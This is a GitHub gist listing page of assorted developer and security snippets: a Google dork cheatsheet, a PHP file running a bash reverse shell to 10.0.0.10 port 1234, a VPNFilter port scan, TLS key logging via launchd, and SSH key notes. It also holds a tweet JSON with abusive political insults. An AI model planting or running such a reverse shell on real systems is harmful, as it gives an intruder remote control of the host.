Skip to content

Instantly share code, notes, and snippets.

View chase2981's full-sized avatar

Chase Gibbons chase2981

View GitHub Profile
@chase2981
chase2981 / tweet.json
Created February 29, 2024 01:54
tweet
{
"created_at": "Wed Jan 01 04:29:05 +0000 2020",
"id": 1212229229728788500,
"id_str": "1212229229728788481",
"text": "Drunk\nDenture Sucking \nDelusional \nDangerous \nDemented \nDemonic \nDemocRATS \nTry her for Treasonous Acts",
"source": "<a href=\"http://twitter.com/#!/download/ipad\" rel=\"nofollow\">Twitter for iPad</a>",
"truncated": false,
"in_reply_to_status_id": null,
"in_reply_to_status_id_str": null,
"in_reply_to_user_id": null,
@chase2981
chase2981 / GoogleDorking.md
Created March 10, 2022 20:10 — forked from sundowndev/GoogleDorking.md
Google dork cheatsheet

Google dork cheatsheet

Search filters

Filter Description Example
allintext Searches for occurrences of all the keywords given. allintext:"keyword"
intext Searches for the occurrences of keywords all at once or one at a time. intext:"keyword"
inurl Searches for a URL matching one of the keywords. inurl:"keyword"
allinurl Searches for a URL matching all the keywords in the query. allinurl:"keyword"
intitle Searches for occurrences of keywords in title all or one. intitle:"keyword"
@chase2981
chase2981 / shell.php
Created March 8, 2022 20:16 — forked from rshipp/shell.php
A tiny PHP/bash reverse shell.
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'");
```shell
2021 daemon.info dnsmasq[6604]: 182 192.168.1.180/40244 query[A] content-autofill.googleapis.com from 192.168.1.180
Tue Jan 19 13:44:06 2021 daemon.info dnsmasq[6604]: 182 192.168.1.180/40244 config error is REFUSED
Tue Jan 19 13:44:06 2021 daemon.info dnsmasq[6604]: 183 192.168.1.180/8132 query[A] content-autofill.googleapis.com from 192.168.1.180
Tue Jan 19 13:44:06 2021 daemon.info dnsmasq[6604]: 183 192.168.1.180/8132 config error is REFUSED
Tue Jan 19 13:44:06 2021 daemon.info dnsmasq[6604]: 184 192.168.1.180/35155 query[A] content-autofill.googleapis.com from 192.168.1.180
Tue Jan 19 13:44:06 2021 daemon.info dnsmasq[6604]: 184 192.168.1.180/35155 config error is REFUSED
Tue Jan 19 13:44:06 2021 daemon.info dnsmasq[6604]: 185 192.168.1.180/4591 query[A] content-autofill.googleapis.com from 192.168.1.180
Tue Jan 19 13:44:06 2021 daemon.info dnsmasq[6604]: 185 192.168.1.180/4591 config error is REFUSED
Tue Jan 19 13:44:06 2021 daemon.info dnsmasq[6604]: 186 192.168.1.180/7485 query[A] content-aut
@chase2981
chase2981 / osx-bootstrap.sh
Created February 1, 2022 05:49 — forked from zeekay/osx-bootstrap.sh
My Mac OSX bootstrap script.
#!/bin/sh
# Bootstrap new OSX system with common CLI utilities and scripts.
# Prereq:
# Install java from: http://www.oracle.com/technetwork/java/javase/downloads/jdk8-downloads-2133151.html
export PATH=~/.ellipsis/bin:/usr/local/bin:$PATH
ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"
@chase2981
chase2981 / README.md
Last active February 1, 2022 08:35
Immutable macos setup

Open new terminal

git clone https://github.com/macsecurity/mac-dev-playbook.git

Install the developer tools

While installing, register to hexnode via safari at https://bit.ly/cwg-enroll-mdm

@chase2981
chase2981 / Test-VPNFilterComebackPorts.ps1
Created January 14, 2022 07:02 — forked from sonjz/Test-VPNFilterComebackPorts.ps1
Powershell - VPNFilter PortScan
#Requires -RunAsAdministrator
# description: quick port scan for vulnerable VPNFilter for your router, you can specify router ip manually,
# by default it will hit the external IP of your router, which is what VPNFilter would be scanning
# author: github @sonjz
param(
[string]$routerIp = $null, # if not provided, it will perform a WhatsMyIp and scan that address
[int[]]$ports = @(23, 80, 2000, 8080), # current VPNFilter ports, http://forums.timewarnercable.com/t5/Connectivity/VPNFilter-Arris-TG1672/m-p/152563/highlight/true#M50525
[switch]$skipInstall = $false,
@chase2981
chase2981 / README.md
Created January 10, 2022 06:54 — forked from felixhammerl/README.md
Write TLS keys system-wide in macOS via SSLKEYLOGFILE and launchd
  1. Put tlskeylogger.plist at ~/Library/LaunchAgents/tlskeylogger.plist
  2. launchctl load ~/Library/LaunchAgents/tlskeylogger.plist, so it will load on the next restart
  3. launchctl start ~/Library/LaunchAgents/tlskeylogger.plist, so it will load the environment variable immediately
  4. Restart your browser(s)
  5. See how TLS keys are being written to ~/.tlskeyfile via tail -f ~/.tlskeyfile
@chase2981
chase2981 / _all_commands.md
Last active February 12, 2024 23:30
commands

Here are some useful commands

@chase2981
chase2981 / ssh_multikeys.md
Created December 6, 2021 06:00 — forked from jmcaldera/ssh_multikeys.md
Multiple SSH Keys macOS

Multiple SSH Keys on same client

Check if you have existing keys by opening the terminal and entering: ssh-add -l OR ls -al ~/.ssh and check for any file called (usually) id_rsa or similar

Identify the host you're using your current key for. You probably added this key to, for example your github or gitlab account. We will use this later on.

If you don't have a config file on ~/.ssh folder, you will need to create one. We'll get back to this later.